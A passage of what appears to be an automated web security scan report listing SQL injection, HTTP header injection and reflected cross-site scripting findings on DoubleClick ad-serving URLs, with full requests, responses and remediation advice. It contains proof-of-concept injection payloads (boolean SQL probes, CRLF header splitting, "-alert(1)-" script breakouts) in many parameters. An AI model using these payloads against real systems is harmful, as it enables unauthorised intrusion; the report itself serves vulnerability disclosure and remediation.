var url = escape("http://ad.doubleclick.net/click%3Bh%3Dv8/3af6/17/11f/%2a/n%3B239957816%3B0-0%3B0%3B61055221%3B4307-300/250%3B40719066/40736853/1%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=13185&sg=506741&o=12457%253A&h=cn&p=&b=21&l=&site=50&pt=2001'%20and%201%3d2--%20&nd=12457&pid=&cid=&pp=100&e=&rqid=01c13-ad-e2:4DB7F9EEA10D5E&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=&t=2011.04.27.21.56.00&event=58/http://www.newegg.com?nm_mc=ExtBanner&cm_mmc=BAC-CBSBrand-_-14MillionGeeks-_-NA-_-NA");
var wmode = "opaque";
var bg = "same as SWF";
var dcallowscriptaccess = "never";

var openWindow = "false";
var winW = 600;
var winH = 400;
var winL = 0;
var winT = 0;

var moviePath=swf.substring(0,swf.lastIndexOf("/"));
var sm=new Array();
sm[1] = "";
sm[2] = "";
sm[3] = "";
sm[4] = "";
sm[5] = "";

var ct=new Array();
ct[0]="";if(ct[0].substr(0,4)!="http"){ct[0]="";}
ct[1] = "";
ct[2] = "";
ct[3] = "";
ct[4] = "";
ct[5] = "";
ct[6] = "";
ct[7] = "";
ct[8] = "";
ct[9] = "";
ct[10] = "";

var fv='"clickTag='+url+'&clickTAG='+url+'&clicktag='+url+'&moviePath='+moviePath+'/'+'&moviepath='+moviePath+'/';
for(i=1;i<sm.length;i++){if(sm[i]!=""){fv+="&submovie"+i+"="+escape(sm[i]);}}
for(i=1;i<ct.length;i++){if(ct[i]!=""){if(ct[i].indexOf("http")==0){x=escape("http://ad.doubleclick.net/click%3Bh%3Dv8/3af6/17/11f/%2a/n%3B239957816%3B0-0%3B0%3B61055221%3B4307-300/250%3B40719066/40736853/1%3B%3B%7Esscs%3D%
...[SNIP]...

1.7. http://ad.doubleclick.net/adi/N4581.811.CBSPUBLISHER/B2336781 [sz parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://ad.doubleclick.net
Path:   /adi/N4581.811.CBSPUBLISHER/B2336781

Issue detail

The sz parameter appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the sz parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /adi/N4581.811.CBSPUBLISHER/B2336781;sz=300x250;click0=http://adlog.com.com/adlog/e/r=13185'%20and%201%3d1--%20&sg=506741&o=12457%253A&h=cn&p=&b=21&l=&site=50&pt=2001&nd=12457&pid=&cid=&pp=100&e=&rqid=01c13-ad-e2:4DB7F9EEA10D5E&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=&t=2011.04.27.21.56.00&event=58/;ord=2011.04.27.21.56.00? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.metacritic.com/games/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response 1

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 22:00:12 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 5555

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 13,901 Template Name = Banner Creative (Flash) - In Page Multiples - [DFA] -->
<!-- Copyright 2006 DoubleClick Inc., All rights reserved. --><script src="http://s0.2mdn.net/879366/flashwrite_1_2.js"></script>
<SCRIPT LANGUAGE="JavaScript">
<!--
function DCFlash(id,pVM){
var swf = "http://s0.2mdn.net/1435575/1-Promotions_0211-1231_Branding-14MillionGeek_300x250.swf";
var gif = "http://s0.2mdn.net/1435575/1-Promotions_0211-1231_Branding-14MillionGeek_300x250.jpg";
var minV = 6;
var FWH = ' width="300" height="250" ';
var url = escape("http://ad.doubleclick.net/click%3Bh%3Dv8/3af6/17/11f/%2a/n%3B239957816%3B0-0%3B0%3B61055221%3B4307-300/250%3B40719066/40736853/1%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=13185'%20and%201%3d1--%20&sg=506741&o=12457%253A&h=cn&p=&b=21&l=&site=50&pt=2001&nd=12457&pid=&cid=&pp=100&e=&rqid=01c13-ad-e2:4DB7F9EEA10D5E&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=&t=2011.04.27.21.56.00&event=58/http://www.newegg.com?nm_mc=ExtBanner&cm_mmc=BAC-CBSBrand-_-14MillionGeeks-_-NA-_-NA");
var wmode = "opaque";
var bg = "same as SWF";
var dcallowscriptaccess = "never";

var openWindow = "false";
var winW = 600;
var winH = 400;
var winL = 0;
var winT = 0;

var moviePath=swf.substring(0,swf.lastIndexOf("/"));
var sm=new Array();
sm[1] = "";
sm[2] = "";
sm[3] = "";
sm[4] = "";
sm[5] = "";

var ct=new Array();
ct[0]="";if(ct[0].substr(0,4)!="http"){ct[0]="";}
ct[1] = "";
ct[2] = "";
ct[3] = "";
ct[4] = "";
ct[5] = "";
ct[6] = "";
ct[7] = "";
ct[8] = "";
ct[9] = "";
ct[10] = "";

var fv='"clickTag='+url+'&clickTAG='+url+'&clicktag='+url+'&moviePath='+moviePath+'/'+'&moviepath='+moviePath+'/';
for(i=1;i<sm.length;i++){if(sm[i]!=""){fv+="&submovie"+i+"="+escape(sm[i]);}}
for(i=1;i<ct.length;i++){if(ct[i]!=""){if(ct[i].indexOf("http")==0){x=escape("http://ad.doubleclick.net/click%3Bh%3Dv8/3af6/17/11f/%2a/n%3B239957816%3B0-0%3B0%3B61055221%3B4307-300/250%3B40719066/40736853/1%3B%3B%7Esscs%3D
...[SNIP]...

Request 2

GET /adi/N4581.811.CBSPUBLISHER/B2336781;sz=300x250;click0=http://adlog.com.com/adlog/e/r=13185'%20and%201%3d2--%20&sg=506741&o=12457%253A&h=cn&p=&b=21&l=&site=50&pt=2001&nd=12457&pid=&cid=&pp=100&e=&rqid=01c13-ad-e2:4DB7F9EEA10D5E&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=&t=2011.04.27.21.56.00&event=58/;ord=2011.04.27.21.56.00? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.metacritic.com/games/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response 2

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 22:00:13 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 845

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3af6/14/11f/%2a/v;240427355;0-0;0;61055221;4307-300/250;41883579/41901366/1;;~sscs=%3fhttp://adlog.com.com/adlog/e/r=13185'%20and%201%3d2--%20&sg=506741&o=12457%253A&h=cn&p=&b=21&l=&site=50&pt=2001&nd=12457&pid=&cid=&pp=100&e=&rqid=01c13-ad-e2:4DB7F9EEA10D5E&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=&t=2011.04.27.21.56.00&event=58/http://promotions.newegg.com/nepro/11-1111/index.html?nm_mc=ExtBanner&cm_mmc=BAC-CBSBrand-_-10off50-_-0426-_-0427"><img src="http://s0.2mdn.net/viewad/1435575/Promotions_0426-0427_Branding-10off50_300x250.jpg" border=0 alt="Click here to find out more!"></a></body></html>

2. HTTP header injection  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /dot.gif

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload cb557%0d%0a32406b19dfe was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Issue background

HTTP header injection vulnerabilities arise when user-supplied data is copied into a response header in an unsafe way. If an attacker can inject newline characters into the header, then they can inject new HTTP headers and also, by injecting an empty line, break out of the headers into the message body and write arbitrary content into the application's response.

Various kinds of attack can be delivered via HTTP header injection vulnerabilities. Any attack that can be delivered via cross-site scripting can usually be delivered via header injection, because the attacker can construct a request which causes arbitrary JavaScript to appear within the response body. Further, it is sometimes possible to leverage header injection vulnerabilities to poison the cache of any proxy server via which users access the application. Here, an attacker sends a crafted request which results in a "split" response containing arbitrary content. If the proxy server can be manipulated to associate the injected response with another URL used within the application, then the attacker can perform a "stored" attack against this URL which will compromise other users who request that URL in future.

Issue remediation

If possible, applications should avoid copying user-controllable data into HTTP response headers. If this is unavoidable, then the data should be strictly validated to prevent header injection attacks. In most situations, it will be appropriate to allow only short alphanumeric strings to be copied into headers, and any other input should be rejected. At a minimum, input containing any characters with ASCII codes less than 0x20 should be rejected.

Request

GET /dot.gifcb557%0d%0a32406b19dfe?2011.04.27.23.14.45 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://news.cnet.com/8301-30686_3-20057815-266.html?tag=topStories1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/dot.gifcb557
32406b19dfe
:
Date: Wed, 27 Apr 2011 23:15:24 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

3. Cross-site scripting (reflected)  previous  next
There are 452 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Remediation background

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences:In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.


3.1. http://ad.doubleclick.net/adi/N1243.TurnerNetwork/B5268151.18 [b parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N1243.TurnerNetwork/B5268151.18

Issue detail

The value of the b request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c6c9c"-alert(1)-"edfe4a4f26d was submitted in the b parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N1243.TurnerNetwork/B5268151.18;sz=300x250;pc=cbs507108;click0=http://adlog.com.com/adlog/e/r=16047&sg=507108&o=22072%253a22408%253a&h=cn&p=2&b=59c6c9c"-alert(1)-"edfe4a4f26d&l=en_US&site=175&pt=2001&nd=22408&pid=&cid=&pp=100&e=&rqid=01phx1-ad-e24:4DB8592938412&orh=cbssports.com&oepartner=&epartner=&ppartner=&pdom=www.cbssports.com&cpnmodule=&count=&ra=173.193.214.243&pg=Tbij-wq0GW4AAGTpQ08&t=2011.04.27.23.17.21&event=58/;ord=2011.04.27.23.17.21? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.cbssports.com/ads/local-page.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:19:18 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 4872

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 15,272 Template Name = Banner Creative (Flash) - In Page
...[SNIP]...
236574810%3B0-0%3B0%3B60245620%3B4307-300/250%3B41415177/41432964/1%3B%3B%7Eokv%3D%3Bpc%3Dcbs507108%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=16047&sg=507108&o=22072%253a22408%253a&h=cn&p=2&b=59c6c9c"-alert(1)-"edfe4a4f26d&l=en_US&site=175&pt=2001&nd=22408&pid=&cid=&pp=100&e=&rqid=01phx1-ad-e24:4DB8592938412&orh=cbssports.com&oepartner=&epartner=&ppartner=&pdom=www.cbssports.com&cpnmodule=&count=&ra=173.193.214.243&pg=T
...[SNIP]...

3.2. http://ad.doubleclick.net/adi/N1243.TurnerNetwork/B5268151.18 [cid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N1243.TurnerNetwork/B5268151.18

Issue detail

The value of the cid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f4c6f"-alert(1)-"ed7ce2bf638 was submitted in the cid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N1243.TurnerNetwork/B5268151.18;sz=300x250;pc=cbs507108;click0=http://adlog.com.com/adlog/e/r=16047&sg=507108&o=22072%253a22408%253a&h=cn&p=2&b=59&l=en_US&site=175&pt=2001&nd=22408&pid=&cid=f4c6f"-alert(1)-"ed7ce2bf638&pp=100&e=&rqid=01phx1-ad-e24:4DB8592938412&orh=cbssports.com&oepartner=&epartner=&ppartner=&pdom=www.cbssports.com&cpnmodule=&count=&ra=173.193.214.243&pg=Tbij-wq0GW4AAGTpQ08&t=2011.04.27.23.17.21&event=58/;ord=2011.04.27.23.17.21? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.cbssports.com/ads/local-page.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:20:22 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 4873

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 15,272 Template Name = Banner Creative (Flash) - In Page
...[SNIP]...
0%3B41415177/41432964/1%3B%3B%7Eokv%3D%3Bpc%3Dcbs507108%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=16047&sg=507108&o=22072%253a22408%253a&h=cn&p=2&b=59&l=en_US&site=175&pt=2001&nd=22408&pid=&cid=f4c6f"-alert(1)-"ed7ce2bf638&pp=100&e=&rqid=01phx1-ad-e24:4DB8592938412&orh=cbssports.com&oepartner=&epartner=&ppartner=&pdom=www.cbssports.com&cpnmodule=&count=&ra=173.193.214.243&pg=Tbij-wq0GW4AAGTpQ08&t=2011.04.27.23.17.21&eve
...[SNIP]...

3.3. http://ad.doubleclick.net/adi/N1243.TurnerNetwork/B5268151.18 [count parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N1243.TurnerNetwork/B5268151.18

Issue detail

The value of the count request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ce68e"-alert(1)-"d288f6ef5a2 was submitted in the count parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N1243.TurnerNetwork/B5268151.18;sz=300x250;pc=cbs507108;click0=http://adlog.com.com/adlog/e/r=16047&sg=507108&o=22072%253a22408%253a&h=cn&p=2&b=59&l=en_US&site=175&pt=2001&nd=22408&pid=&cid=&pp=100&e=&rqid=01phx1-ad-e24:4DB8592938412&orh=cbssports.com&oepartner=&epartner=&ppartner=&pdom=www.cbssports.com&cpnmodule=&count=ce68e"-alert(1)-"d288f6ef5a2&ra=173.193.214.243&pg=Tbij-wq0GW4AAGTpQ08&t=2011.04.27.23.17.21&event=58/;ord=2011.04.27.23.17.21? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.cbssports.com/ads/local-page.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:22:08 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 4878

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 15,272 Template Name = Banner Creative (Flash) - In Page
...[SNIP]...
22408%253a&h=cn&p=2&b=59&l=en_US&site=175&pt=2001&nd=22408&pid=&cid=&pp=100&e=&rqid=01phx1-ad-e24:4DB8592938412&orh=cbssports.com&oepartner=&epartner=&ppartner=&pdom=www.cbssports.com&cpnmodule=&count=ce68e"-alert(1)-"d288f6ef5a2&ra=173.193.214.243&pg=Tbij-wq0GW4AAGTpQ08&t=2011.04.27.23.17.21&event=58/http://content.dove.us/mencare/Products.aspx?utm_source=CBSSPORTS&utm_medium=traditional&utm_campaign=DMC_Deo_Product_Media_201
...[SNIP]...

3.4. http://ad.doubleclick.net/adi/N1243.TurnerNetwork/B5268151.18 [cpnmodule parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N1243.TurnerNetwork/B5268151.18

Issue detail

The value of the cpnmodule request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 80897"-alert(1)-"d0bb0cf4d58 was submitted in the cpnmodule parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N1243.TurnerNetwork/B5268151.18;sz=300x250;pc=cbs507108;click0=http://adlog.com.com/adlog/e/r=16047&sg=507108&o=22072%253a22408%253a&h=cn&p=2&b=59&l=en_US&site=175&pt=2001&nd=22408&pid=&cid=&pp=100&e=&rqid=01phx1-ad-e24:4DB8592938412&orh=cbssports.com&oepartner=&epartner=&ppartner=&pdom=www.cbssports.com&cpnmodule=80897"-alert(1)-"d0bb0cf4d58&count=&ra=173.193.214.243&pg=Tbij-wq0GW4AAGTpQ08&t=2011.04.27.23.17.21&event=58/;ord=2011.04.27.23.17.21? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.cbssports.com/ads/local-page.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:21:58 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 4878

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 15,272 Template Name = Banner Creative (Flash) - In Page
...[SNIP]...
72%253a22408%253a&h=cn&p=2&b=59&l=en_US&site=175&pt=2001&nd=22408&pid=&cid=&pp=100&e=&rqid=01phx1-ad-e24:4DB8592938412&orh=cbssports.com&oepartner=&epartner=&ppartner=&pdom=www.cbssports.com&cpnmodule=80897"-alert(1)-"d0bb0cf4d58&count=&ra=173.193.214.243&pg=Tbij-wq0GW4AAGTpQ08&t=2011.04.27.23.17.21&event=58/http://content.dove.us/mencare/Products.aspx?utm_source=CBSSPORTS&utm_medium=traditional&utm_campaign=DMC_Deo_Product_Me
...[SNIP]...

3.5. http://ad.doubleclick.net/adi/N1243.TurnerNetwork/B5268151.18 [e parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N1243.TurnerNetwork/B5268151.18

Issue detail

The value of the e request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload aa51d"-alert(1)-"1d6c11e2fec was submitted in the e parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N1243.TurnerNetwork/B5268151.18;sz=300x250;pc=cbs507108;click0=http://adlog.com.com/adlog/e/r=16047&sg=507108&o=22072%253a22408%253a&h=cn&p=2&b=59&l=en_US&site=175&pt=2001&nd=22408&pid=&cid=&pp=100&e=aa51d"-alert(1)-"1d6c11e2fec&rqid=01phx1-ad-e24:4DB8592938412&orh=cbssports.com&oepartner=&epartner=&ppartner=&pdom=www.cbssports.com&cpnmodule=&count=&ra=173.193.214.243&pg=Tbij-wq0GW4AAGTpQ08&t=2011.04.27.23.17.21&event=58/;ord=2011.04.27.23.17.21? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.cbssports.com/ads/local-page.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:20:44 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 4873

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 15,272 Template Name = Banner Creative (Flash) - In Page
...[SNIP]...
77/41432964/1%3B%3B%7Eokv%3D%3Bpc%3Dcbs507108%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=16047&sg=507108&o=22072%253a22408%253a&h=cn&p=2&b=59&l=en_US&site=175&pt=2001&nd=22408&pid=&cid=&pp=100&e=aa51d"-alert(1)-"1d6c11e2fec&rqid=01phx1-ad-e24:4DB8592938412&orh=cbssports.com&oepartner=&epartner=&ppartner=&pdom=www.cbssports.com&cpnmodule=&count=&ra=173.193.214.243&pg=Tbij-wq0GW4AAGTpQ08&t=2011.04.27.23.17.21&event=58/http
...[SNIP]...

3.6. http://ad.doubleclick.net/adi/N1243.TurnerNetwork/B5268151.18 [epartner parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N1243.TurnerNetwork/B5268151.18

Issue detail

The value of the epartner request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b9c36"-alert(1)-"b25cda93eb9 was submitted in the epartner parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N1243.TurnerNetwork/B5268151.18;sz=300x250;pc=cbs507108;click0=http://adlog.com.com/adlog/e/r=16047&sg=507108&o=22072%253a22408%253a&h=cn&p=2&b=59&l=en_US&site=175&pt=2001&nd=22408&pid=&cid=&pp=100&e=&rqid=01phx1-ad-e24:4DB8592938412&orh=cbssports.com&oepartner=&epartner=b9c36"-alert(1)-"b25cda93eb9&ppartner=&pdom=www.cbssports.com&cpnmodule=&count=&ra=173.193.214.243&pg=Tbij-wq0GW4AAGTpQ08&t=2011.04.27.23.17.21&event=58/;ord=2011.04.27.23.17.21? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.cbssports.com/ads/local-page.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
